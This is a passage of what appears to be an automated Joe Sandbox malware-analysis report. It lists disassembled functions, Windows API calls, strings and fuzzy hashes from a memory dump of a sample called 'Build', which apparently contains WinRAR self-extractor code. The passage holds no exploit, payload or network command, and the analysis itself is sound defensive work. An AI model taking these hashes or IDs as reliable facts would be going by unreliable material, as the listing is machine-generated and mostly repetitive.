                                                                                          • WriteFile.KERNEL32(?,00000000,00000000,R$9,00000000,?,?,?,?,?,?,?,?,?,00392452,00000000), ref: 00391DFA
                                                                                          • WriteFile.KERNEL32(?,00000000,00000001,R$9,00000000,?,?,?,?,?,?,?,?,?,00392452,00000000), ref: 00391E33
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                          • String ID: R$9
                                                                                          • API String ID: 1324828854-1049905762
                                                                                          • Opcode ID: a1bf5ce7494012d5f2cf88f3fcae76ffc970b51d8a57d1454af2fe90d78f3de9
                                                                                          • Instruction ID: fe3fc501f3d9e5ba75b18cbf02936188e4bdac9a22a97a4a5798ffe5859ba348
                                                                                          • Opcode Fuzzy Hash: a1bf5ce7494012d5f2cf88f3fcae76ffc970b51d8a57d1454af2fe90d78f3de9
                                                                                          • Instruction Fuzzy Hash: 32514F71E0024AAFDF12CFA8D885AEEBBB8FF09300F15455AE955F7291D731A941CB60
                                                                                          APIs
                                                                                            • Part of subcall function 00361366: GetDlgItem.USER32(00000000,00003021), ref: 003613AA
                                                                                            • Part of subcall function 00361366: SetWindowTextW.USER32(00000000,003965F4), ref: 003613C0
                                                                                          • EndDialog.USER32(?,00000001), ref: 0037D910
                                                                                          • SendMessageW.USER32(?,00000080,00000001,0002048D), ref: 0037D937
                                                                                          • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0037D950
                                                                                          • SetWindowTextW.USER32(?,?), ref: 0037D961
                                                                                          • GetDlgItem.USER32(?,00000065), ref: 0037D96A
                                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0037D97E
                                                                                          • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0037D994
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                          • String ID: LICENSEDLG
                                                                                          • API String ID: 3214253823-2177901306
                                                                                          • Opcode ID: d79d2d560e48ac41e3f93894d8491092561e7cbad933b99a54c72b79728cbc58
                                                                                          • Instruction ID: 732186f843a4f062611e8cb9fd10cde8b95947b249a4da6966414e2897e5fed7
                                                                                          • Opcode Fuzzy Hash: d79d2d560e48ac41e3f93894d8491092561e7cbad933b99a54c72b79728cbc58
                                                                                          • Instruction Fuzzy Hash: E2219C32204214BBD7236F25EC49E7B3B7CEB47B45F05C018FB04E65A0CB66A9009B71
                                                                                          APIs
                                                                                          • _wcslen.LIBCMT ref: 0036BFA3
                                                                                            • Part of subcall function 003734D7: GetSystemTime.KERNEL32(?,00000000), ref: 003734EF
                                                                                            • Part of subcall function 003734D7: SystemTimeToFileTime.KERNEL32(?,?), ref: 003734FD
                                                                                            • Part of subcall function 00373480: __aulldiv.LIBCMT ref: 00373489
                                                                                          • __aulldiv.LIBCMT ref: 0036BFCF
                                                                                          • GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,?,?,?,?), ref: 0036BFD6
                                                                                          • _swprintf.LIBCMT ref: 0036C001
                                                                                            • Part of subcall function 00364C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00364C13
                                                                                          • _wcslen.LIBCMT ref: 0036C00B
                                                                                          • _swprintf.LIBCMT ref: 0036C061
                                                                                          • _wcslen.LIBCMT ref: 0036C06B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: Time_wcslen$System__aulldiv_swprintf$CurrentFileProcess__vswprintf_c_l
                                                                                          • String ID: %u.%03u
                                                                                          • API String ID: 2956649372-1114938957
                                                                                          • Opcode ID: e71c131ef755501bea06525c71e069f4aeb1de4e4cdc1e8097f074921f1a7003
                                                                                          • Instruction ID: 866ada4f6bfab2975611e41004f05be3cccae4099eb058d463f315797aa156ac
                                                                                          • Opcode Fuzzy Hash: e71c131ef755501bea06525c71e069f4aeb1de4e4cdc1e8097f074921f1a7003
                                                                                          • Instruction Fuzzy Hash: 66218472A14340AFC626EF65CC86EAFB7DCEBC4740F40891EF489D7241DA35D90887A2
                                                                                          APIs
                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0037CBEE
                                                                                          • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 0037CC05
                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 0037CC19
                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0037CC2A
                                                                                          • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0037CC42
                                                                                          • GetTimeFormatW.KERNEL32(00000400,?,?,00000000,00000000,00000032), ref: 0037CC66
                                                                                          • _swprintf.LIBCMT ref: 0037CC85
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: Time$System$File$Format$DateLocalSpecific_swprintf
                                                                                          • String ID: %s %s
                                                                                          • API String ID: 385609497-2939940506
                                                                                          • Opcode ID: 636f2a9dde15f5c8faa70763aa4867cbf4ccd67237750894bb1db593fee3408e
                                                                                          • Instruction ID: 9bfb2bbfad5c9bcb2f78f85bedab04b465b6ca6118ec0948235ede9acf3537ed
                                                                                          • Opcode Fuzzy Hash: 636f2a9dde15f5c8faa70763aa4867cbf4ccd67237750894bb1db593fee3408e
                                                                                          • Instruction Fuzzy Hash: A9213BB290024CABDB22DFA1DD45EEF77BCEF09300F10456AFA09D7152E6319A05CB60
                                                                                          APIs
                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,0036CEA9,0036CEAB,00000000,00000000,92C77967,00000001,00000000,00000000,?,0036CD87,?,00000004,0036CEA9,ROOT\CIMV2), ref: 003823E9
                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,0036CEA9,?,00000000,00000000,?,?,0036CD87,?,00000004,0036CEA9), ref: 00382464
                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 0038246F
                                                                                          • _com_issue_error.COMSUPP ref: 00382498
                                                                                          • _com_issue_error.COMSUPP ref: 003824A2
                                                                                          • GetLastError.KERNEL32(80070057,92C77967,00000001,00000000,00000000,?,0036CD87,?,00000004,0036CEA9,ROOT\CIMV2), ref: 003824A7
                                                                                          • _com_issue_error.COMSUPP ref: 003824BA
                                                                                          • GetLastError.KERNEL32(00000000,?,0036CD87,?,00000004,0036CEA9,ROOT\CIMV2), ref: 003824D0
                                                                                          • _com_issue_error.COMSUPP ref: 003824E3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                          • String ID:
                                                                                          • API String ID: 1353541977-0
                                                                                          • Opcode ID: 76743ea0347ad6480a490f077dc5acc5efa2203ebfc8a5f25bd60d1dbe9761b4
                                                                                          • Instruction ID: 91fbed308f57ff44d8b5ceaa87fe37a6bfd9194c906eb93d4d1feaf99df80732
                                                                                          • Opcode Fuzzy Hash: 76743ea0347ad6480a490f077dc5acc5efa2203ebfc8a5f25bd60d1dbe9761b4
                                                                                          • Instruction Fuzzy Hash: 05412875A00305ABDB12AF69DC46BAFBBA8EB48710F2042AAF505E7291D7759900C7B4
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: __alldvrm$_strrchr
                                                                                          • String ID: =z8$=z8$=z8
                                                                                          • API String ID: 1036877536-2376782586
                                                                                          • Opcode ID: d14ae59a6c47695d102f38ce8bebab2561187863f3de3b9f7c7780fcd14afeb7
                                                                                          • Instruction ID: b65a7c2d47ef0010566d307c2e360e2f4c11f1e72b0637dce21efb499cb05399
                                                                                          • Opcode Fuzzy Hash: d14ae59a6c47695d102f38ce8bebab2561187863f3de3b9f7c7780fcd14afeb7
                                                                                          • Instruction Fuzzy Hash: E5A17B769203869FDB17EF68C8917AEBBE4EF11340F1941EDE4859B282C2788D42C770
                                                                                          APIs
                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00384F57
                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00384F5F
                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00384FE8
                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00385013
                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00385068
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                          • String ID: M8$csm
                                                                                          • API String ID: 1170836740-1673394271
                                                                                          • Opcode ID: 7d9fd565ba9621c04fdf840d514f82a4ac28d83604c6384cff214631d86425d7
                                                                                          • Instruction ID: 7ff692daef0f1285f54de6092b3280e306bc36e9fcbafb1707324f8d614cb665
                                                                                          • Opcode Fuzzy Hash: 7d9fd565ba9621c04fdf840d514f82a4ac28d83604c6384cff214631d86425d7
                                                                                          • Instruction Fuzzy Hash: FD41E674A003199FCF12EF68C885A9EBBB5BF45314F1481D9F9149F752DB329A11CB90
                                                                                          APIs
                                                                                          • __aulldiv.LIBCMT ref: 0037331D
                                                                                            • Part of subcall function 0036D076: GetVersionExW.KERNEL32(?), ref: 0036D0A7
                                                                                          • FileTimeToLocalFileTime.KERNEL32(000000FF,?,?,000000FF,00000064,00000000,?,00000000), ref: 00373340
                                                                                          • FileTimeToSystemTime.KERNEL32(000000FF,?,?,000000FF,00000064,00000000,?,00000000), ref: 00373352
                                                                                          • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00373363
                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00373373
                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00373383
                                                                                          • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 003733BE
                                                                                          • __aullrem.LIBCMT ref: 00373464
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                          • String ID:
                                                                                          • API String ID: 1247370737-0
                                                                                          • Opcode ID: a9bea617297660111dfab78ed2320d8afc9fe729b09ceb594ae256e6985ec81a
                                                                                          • Instruction ID: 3c07111bbd7260a8baffe5ff9f605be60541ff2cb4742a0002c059c9b01249ce
                                                                                          • Opcode Fuzzy Hash: a9bea617297660111dfab78ed2320d8afc9fe729b09ceb594ae256e6985ec81a
                                                                                          • Instruction Fuzzy Hash: 0D5136B1508305AFC715DF65C88196BFBE9FF88714F00892EF59AC6210E739EA49CB52
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcslen
                                                                                          • String ID: </p>$</style>$<br>$<style>$>
                                                                                          • API String ID: 176396367-3568243669
                                                                                          • Opcode ID: 2b0c8e48f4733875438c3f125f9002b25d8f3f692f8feb61eaec99c01385b10a
                                                                                          • Instruction ID: 7168230fbbe6b023bc10b5b3cc5842374ebd1be39e83584c877c1d1463741631
                                                                                          • Opcode Fuzzy Hash: 2b0c8e48f4733875438c3f125f9002b25d8f3f692f8feb61eaec99c01385b10a
                                                                                          • Instruction Fuzzy Hash: 32510A5664031796DB336E1958217B6E3F4DFA4790F6AC42AFDC8DB2C0FB5C8C418261
                                                                                          APIs
                                                                                          • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 0036AD2B
                                                                                          • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 0036AD4A
                                                                                            • Part of subcall function 0036E208: _wcslen.LIBCMT ref: 0036E210
                                                                                            • Part of subcall function 00374168: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,0036E084,00000000,.exe,?,?,00000800,?,?,?,0037AD5D), ref: 0037417E
                                                                                          • _swprintf.LIBCMT ref: 0036ADEC
                                                                                            • Part of subcall function 00364C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00364C13
                                                                                          • MoveFileW.KERNEL32(?,?), ref: 0036AE5E
                                                                                          • MoveFileW.KERNEL32(?,?), ref: 0036AE9E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileMoveNamePath$CompareLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                                          • String ID: rtmp%d
                                                                                          • API String ID: 2133196417-3303766350
                                                                                          • Opcode ID: c417ef4b435345af04c1d284aa021e92a22b0cd6386869bc189fd7394ec304c3
                                                                                          • Instruction ID: def58d9974e5e4480444f144928152f3b0ebe624edd6c086484bf3b2bc3dd688
                                                                                          • Opcode Fuzzy Hash: c417ef4b435345af04c1d284aa021e92a22b0cd6386869bc189fd7394ec304c3
                                                                                          • Instruction Fuzzy Hash: 56519271900A186ACF22EBA0CC85EEF73BCBF45341F0488A9B556E7145EB359A84DF61
                                                                                          APIs
                                                                                          • ShowWindow.USER32(?,00000000), ref: 0037BE8A
                                                                                          • GetWindowRect.USER32(?,?), ref: 0037BED1
                                                                                          • ShowWindow.USER32(?,00000005,00000000), ref: 0037BF6C
                                                                                          • SetWindowTextW.USER32(?,00000000), ref: 0037BF74
                                                                                          • ShowWindow.USER32(00000000,00000005), ref: 0037BF8A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Show$RectText
                                                                                          • String ID: RarHtmlClassName
                                                                                          • API String ID: 3937224194-1658105358
                                                                                          • Opcode ID: 488c4ff051d089e58fdd1225ef810a4040813b68c5c19295774f25276ade7184
                                                                                          • Instruction ID: 6a376ddfbc8b68ce2077a63270f6dca553348a7d14260f44bfca0c41f705de00
                                                                                          • Opcode Fuzzy Hash: 488c4ff051d089e58fdd1225ef810a4040813b68c5c19295774f25276ade7184
                                                                                          • Instruction Fuzzy Hash: 52415E72508300AFCB229F649C49B6BBBFCAB48751F1A8559FD49DA151DB34E800CFA1
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcslen
                                                                                          • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                          • API String ID: 176396367-3743748572
                                                                                          • Opcode ID: f97f4931c1e2038bc32ffae84167b1c0757855a93300c0716654df2bcaa3a98c
                                                                                          • Instruction ID: dd7303899e515cdb0bb5e1e0db1bacf35a195c72fb4c47e88aafc1eae2dd002b
                                                                                          • Opcode Fuzzy Hash: f97f4931c1e2038bc32ffae84167b1c0757855a93300c0716654df2bcaa3a98c
                                                                                          • Instruction Fuzzy Hash: B831422264430556D636BB549C42B77F3F4EB91310F51C42EF7A99B2C0FB59BC4443A1
                                                                                          APIs
                                                                                            • Part of subcall function 0038EEB8: _free.LIBCMT ref: 0038EEE1
                                                                                          • _free.LIBCMT ref: 0038EF42
                                                                                            • Part of subcall function 0038BAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,0038EEE6,?,00000000,?,00000000,?,0038EF0D,?,00000007,?,?,0038F30A,?), ref: 0038BB10
                                                                                            • Part of subcall function 0038BAFA: GetLastError.KERNEL32(?,?,0038EEE6,?,00000000,?,00000000,?,0038EF0D,?,00000007,?,?,0038F30A,?,?), ref: 0038BB22
                                                                                          • _free.LIBCMT ref: 0038EF4D
                                                                                          • _free.LIBCMT ref: 0038EF58
                                                                                          • _free.LIBCMT ref: 0038EFAC
                                                                                          • _free.LIBCMT ref: 0038EFB7
                                                                                          • _free.LIBCMT ref: 0038EFC2
                                                                                          • _free.LIBCMT ref: 0038EFCD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                          • String ID:
                                                                                          • API String ID: 776569668-0
                                                                                          • Opcode ID: ed90a822092467ab948ce4ab8a4e5ff1fef504289117e408d2aed02f462530fb
                                                                                          • Instruction ID: 93ae5ba0b3e3ebcf83bc64c075d14f0cc7b356cb19ba453e73d31b6bb35374cb
                                                                                          • Opcode Fuzzy Hash: ed90a822092467ab948ce4ab8a4e5ff1fef504289117e408d2aed02f462530fb
                                                                                          • Instruction Fuzzy Hash: EC112172941B05AAE522F7B1CC07FCBB7AC6F44700F404C55F29A7E292DB79B5054754
                                                                                          APIs
